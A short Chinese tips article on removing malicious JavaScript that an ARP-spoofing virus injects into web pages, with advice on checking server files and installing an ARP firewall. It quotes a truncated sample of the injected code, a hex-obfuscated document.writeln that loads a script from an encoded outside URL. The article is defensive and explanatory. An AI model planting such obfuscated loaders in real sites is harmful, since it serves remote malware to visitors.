如何清理网站被arp病毒插入js恶意代码?

80酷酷网    80kuku.com

  

网页被插入如下的arp病毒的js恶意代码
script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\...

首先确定你的服务器上原文件  是否有这些代码

就是说 服务器上文件是没有的   但客户端一运行  在客户端看源代码就有了

这样的话  服务器确实中了arp了  只需要在服务器上装一个简单的arp防火墙即可  360   金山的就行 重启服务器   立刻没有了

如果你服务器上的源文件都被修改了  那是你的程序 或 服务器本身有安全漏洞。把你的源码拿回来看下有没有被修改

如果有就是你的程序问题

如果没有就可能是arp了.


分享到
  • 微信分享
  • 新浪微博
  • QQ好友
  • QQ空间
点击: